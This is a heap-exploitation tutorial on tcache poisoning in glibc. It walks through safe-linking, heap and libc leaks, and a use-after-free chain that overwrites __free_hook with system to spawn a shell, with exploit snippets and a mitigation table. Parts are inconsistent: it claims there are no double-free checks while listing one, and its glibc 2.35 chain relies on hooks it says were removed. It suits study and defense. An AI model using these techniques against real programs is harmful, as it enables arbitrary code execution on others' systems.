Heap Exploitation 101: Tcache Poisoning on glibc 2.35
Understanding tcache internals and poisoning the freelist for arbitrary write on modern glibc - covering safe-linking, heap and libc leaks, and a complete exploit walk-through against a use-after-free.
Tcache Overview
Since glibc 2.26, the per-thread cache holds up to 7 freed chunks per size class in a singly-linked LIFO list. Poisoning the forward pointer redirects where the next allocation lands.
The tcache (thread-local caching bin) was introduced for performance - most allocations are small and short-lived, so an unsynchronised per-thread free list dramatically reduces lock contention compared to the older fastbin / smallbin paths. From an attacker’s perspective, this same simplicity makes it the cleanest primitive in modern heap exploitation: there are no double-free checks, no size sanity, no bin-list integrity checks beyond tcache_count, and no coalescing. If you can land a single write into the right place, you own the next allocation of that size class.
Internal Layout
When a chunk is freed and lands in the tcache, glibc reuses the user data area to form a singly-linked list. The first 8 bytes (where the user used to write) become the next pointer to the previous chunk in the list, and the second 8 bytes become key - a per-thread sentinel meant to detect double-frees.
Freed chunk in tcache:
+--------------+--------------+
| prev_size | size | ← chunk header (16 bytes on x64)
+--------------+--------------+
| next (fd) | key | ← user-data area, repurposed
+--------------+--------------+
| ... unused user data ... |
+--------------+--------------+
The corresponding tcache_perthread_struct lives at the start of the heap and carries one entry per size class:
typedef struct tcache_perthread_struct {
uint16_t counts[TCACHE_MAX_BINS];
tcache_entry *entries[TCACHE_MAX_BINS]; // Per-size LIFO heads
} tcache_perthread_struct;
malloc(n) for a tcache-eligible size first checks entries[idx], and if non-NULL, unlinks the head: entries[idx] = head->next. That single dereference is exactly what poisoning targets - control head->next and the next allocation of that size returns wherever you point.
Size Classes Cached
On x64, tcache caches sizes from 0x20 (smallest user-callable malloc) up to 0x410 in 0x10 increments - 64 size classes total, 7 chunks each, so a thread can keep 448 cached chunks before falling back to fastbin/unsorted bin paths.
The Core Primitive
The classic tcache-poison flow assumes a use-after-free or off-by-one that lets you write to a freed chunk’s next pointer:
1. Free A → tcache[idx] = A, A->next = NULL
2. Free B → tcache[idx] = B, B->next = A
3. UAF write on B: overwrite B->next = TARGET
4. malloc() → returns B
5. malloc() → returns TARGET ← arbitrary allocation
Step 5 is the magic moment. Whatever TARGET is - __free_hook, __malloc_hook, a function pointer in .bss, an entry in a vtable, the _IO_2_1_stdout_ FILE struct - the next allocation lands there, and you can write controlled bytes to it.
Safe-Linking (glibc >= 2.32)
Modern glibc XORs the forward pointer with chunk_addr >> 12. You need a heap leak to compute the correct mangled pointer.
This mitigation, introduced by Eyal Itkin, was inspired by the Linux kernel’s freelist_random / random_kmalloc_caches. The idea is brutally simple: instead of storing a raw next pointer, glibc stores PROTECT_PTR(pos, ptr) defined as:
#define PROTECT_PTR(pos, ptr) ((__typeof(ptr))((((size_t)pos) >> 12) ^ (size_t)ptr))
#define REVEAL_PTR(ptr) PROTECT_PTR(&ptr, ptr)
The pos argument is the address of the slot holding the pointer (i.e. the chunk address itself). Two consequences:
- You can’t blindly write a target address. Without knowing where the current chunk lives in the heap, you cannot pre-compute the XOR mask, so a single arbitrary write into
nextproduces garbage. - It’s not memory-safe alignment-checked unless you target a 16-byte-aligned slot. Since glibc 2.32, it also asserts that the unmasked pointer is 16-byte aligned (
if (__glibc_unlikely(!aligned_OK(REVEAL_PTR(victim))))→ abort). So your forged target must be aligned, which rules out some “land in the middle of a buffer” tricks but not others.
In short: safe-linking turns “one UAF write = arbitrary allocation” into “one UAF write plus a heap leak = arbitrary allocation”. It is a speed bump, not a wall.
Computing the Mask
Given a heap leak heap_addr (any address inside the heap is fine - page-align down to 0x1000), and a target target_addr:
def mangle(heap_addr_of_chunk, target_addr):
return (heap_addr_of_chunk >> 12) ^ target_addr
You need the address of the chunk whose next field you are corrupting, not the heap base. With a leak from the unsorted bin (libc) or any heap-resident pointer (e.g. a freed chunk’s fd before tcache absorbs it), you can derive this.
Exploit Flow
- Leak heap address (for safe-linking bypass)
- Leak libc (via unsorted bin)
- Tcache poison → overwrite
__free_hookwithsystem - Free a chunk containing “/bin/sh” → shell
Each step deserves its own walk-through, because the order matters and the chunks must be sized carefully.
Step 1 - Heap Leak
The cleanest source is the tcache itself. When you free chunk A and then chunk B into the same size class, B’s next field becomes mangle(&B, A). If you can read B (via a print/show primitive on the freed object - UAF or off-by-null-terminator) you read the mangled value. Knowing that next should equal A’s address XOR (&B >> 12), the page-aligned heap base falls out immediately, because chunk addresses share the high bits with the heap base.
Alternative leak sources:
- Unsorted bin chunk: chunks larger than 0x410 (above the tcache range) freed without immediate reuse end up in the unsorted bin, which uses
bk/fdpointing intomain_arena. The first such chunk is also linked to the next chunk in the heap, giving you both libc and heap leaks in one read. - Large bin chunks: contain
fd_nextsize/bk_nextsizepointers - also yield heap addresses. - Tcache stash mechanism (glibc ≥ 2.29): when the tcache is partially full and a smallbin allocation happens, glibc stashes extra chunks back into tcache, and their
bkpointers contain libc-side addresses.
Step 2 - Libc Leak
To call system, execve, or write a one-gadget, you need libc base. The standard trick is to allocate a chunk larger than 0x410 (above tcache), free it, then allocate again to reclaim it - at which point its fd/bk (which were pointing into main_arena) are still readable in the user data area if you only consumed part of the chunk:
// 1. Allocate a 0x500-byte chunk (above tcache range)
A = malloc(0x500);
B = malloc(0x20); // guard chunk to prevent top-merge
// 2. Free A - goes into unsorted bin, fd/bk now point into main_arena
free(A);
// 3. Read A back (UAF) - first 8 bytes are an address inside libc
libc_leak = read(A, 8);
libc_base = libc_leak - MAIN_ARENA_OFFSET;
MAIN_ARENA_OFFSET is constant per glibc build and easy to derive from a copy of libc.so.6.
Step 3 - Tcache Poison
With both leaks, target __free_hook. It’s a writable function pointer in libc that, if non-NULL, is called by free() with the chunk pointer as its argument - perfect for system("/bin/sh") because the chunk pointer becomes the argument.
# Two same-size chunks
a = malloc(0x40)
b = malloc(0x40)
# Free both into tcache: head = b, b->next = mangle(&b, a)
free(a)
free(b)
# UAF write on b: overwrite next
free_hook = libc_base + LIBC_FREE_HOOK_OFFSET
mangled = (heap_addr_of_b >> 12) ^ free_hook
write(b, p64(mangled))
# Drain tcache
malloc(0x40) # returns b
target = malloc(0x40) # returns __free_hook ← arbitrary allocation
write(target, p64(libc_base + LIBC_SYSTEM_OFFSET))
Step 4 - Trigger
Allocate a chunk whose user data starts with "/bin/sh\0", then free it. The free() call now jumps to __free_hook, which has been replaced with system, with the user-data pointer (/bin/sh) as its first argument:
sh = malloc(0x40)
write(sh, b"/bin/sh\x00")
free(sh) # → system("/bin/sh") → shell
Hook Removal in glibc 2.34+
__malloc_hook and __free_hook were removed in glibc 2.34. On a modern target you can no longer use this exact landing pad. The current canonical replacements are:
- FILE struct exploitation: poison
_IO_list_allto a fake_IO_FILEwhosevtablepoints to controlled memory, then trigger anyprintf/fwrite/exit-flush. Search for “House of Apple 2”, “House of Banana”, “FSOP”. __exit_funcs: glibc registers a linked list of functions to call at process exit. The list pointers are mangled withPTR_DEMANGLE(XOR + ROR withtls.pointer_guard), so you also need a TLS leak.- stdout
_IO_2_1_stdout_->_wide_data->_wide_vtable: a particularly clean target post-2.34, exercised by FSOP chains. tls_dtor_list: another callback list reachable at exit if__cxa_thread_atexit_implwas used.
The high-level pattern is the same: tcache-poison your way to writing a fake vtable pointer into a structure that is dereferenced for an indirect call.
Defensive Notes
| Mitigation | Effect on tcache-poison |
|---|---|
| Safe-linking (2.32+) | Requires heap leak |
tcache_count integrity check (2.29+) |
Counter incremented on free; over-allocation traps. Not a real obstacle. |
tcache_key double-free check (2.29+) |
Compares key to per-thread random; freeing twice without changing key aborts. |
| 16-byte alignment check (2.32+) | Forged target addresses must be 16-aligned |
__malloc_hook/__free_hook removal (2.34+) |
Forces FILE-stream / __exit_funcs chains |
_FORTIFY_SOURCE=2/3 |
Catches a handful of overflow primitives but not the freelist write |
MALLOC_CHECK_=3 env |
Strong overflow/double-free detection - opt-in only |
Modern heap exploitation is all about leaking the right addresses. Once you have heap base + libc base, the rest is mechanical. Tcache is the simplest primitive in the allocator and the first one you should master before diving into fastbin AC, unsorted-bin attacks, large-bin tricks, or House-of-* recipes.